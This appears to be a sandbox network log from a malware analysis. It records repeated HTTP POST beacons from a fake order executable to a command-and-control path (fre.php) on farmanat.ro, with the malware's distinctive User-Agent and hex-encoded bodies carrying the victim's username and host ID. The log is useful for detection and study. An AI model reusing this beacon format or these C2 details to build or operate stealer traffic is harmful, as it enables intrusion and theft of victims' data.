Nov 25, 2021 10:53:12.051973104 CET	7139	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:12.086221933 CET	7140	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:12.136879921 CET	7140	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
597	192.168.11.20	50441	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:12.567728996 CET	7141	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:12.601227045 CET	7141	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:12.651314974 CET	7141	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
598	192.168.11.20	50442	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:13.013848066 CET	7142	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:13.047872066 CET	7142	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:13.102065086 CET	7143	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
599	192.168.11.20	50443	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:13.443384886 CET	7143	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:13.477229118 CET	7144	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:13.528346062 CET	7144	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.11.20	49825	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:03.921017885 CET	6307	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:03.955220938 CET	6307	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:04.006619930 CET	6308	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
60	192.168.11.20	49896	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:39.761326075 CET	6392	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:39.795603037 CET	6392	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:39.845088005 CET	6393	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
600	192.168.11.20	50444	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:13.950037956 CET	7145	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:13.984283924 CET	7145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:14.034276009 CET	7145	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
601	192.168.11.20	50445	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:14.461541891 CET	7146	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:14.494992971 CET	7146	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:14.544886112 CET	7147	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
602	192.168.11.20	50446	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:14.963607073 CET	7147	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:14.997045040 CET	7148	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:15.049539089 CET	7148	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
603	192.168.11.20	50447	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:15.460895061 CET	7149	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:15.495127916 CET	7149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:15.545490980 CET	7149	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
604	192.168.11.20	50448	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:15.970796108 CET	7150	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:16.004349947 CET	7150	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:16.055986881 CET	7151	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
605	192.168.11.20	50449	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:16.443542957 CET	7151	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:16.477766037 CET	7152	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:16.527874947 CET	7152	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
606	192.168.11.20	50450	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:16.946928024 CET	7153	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:16.980422020 CET	7153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:17.030407906 CET	7153	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
607	192.168.11.20	50451	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:17.460875988 CET	7154	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:17.495172024 CET	7154	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:17.544984102 CET	7155	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
608	192.168.11.20	50452	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:17.961555958 CET	7155	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:17.995796919 CET	7156	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:18.047055006 CET	7156	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
609	192.168.11.20	50453	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:18.455843925 CET	7157	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:18.489264011 CET	7157	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:18.537883043 CET	7157	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
61	192.168.11.20	49897	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:40.218861103 CET	6394	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:40.252240896 CET	6394	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:40.303121090 CET	6394	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
610	192.168.11.20	50454	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:18.884130001 CET	7158	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:18.918242931 CET	7158	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:18.967533112 CET	7159	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
611	192.168.11.20	50455	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:19.409172058 CET	7159	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:19.443325043 CET	7160	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:19.500919104 CET	7160	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
612	192.168.11.20	50456	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:19.898077965 CET	7161	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:19.931642056 CET	7161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:19.988430977 CET	7161	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
613	192.168.11.20	50458	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:20.393989086 CET	7163	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:20.427464962 CET	7168	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
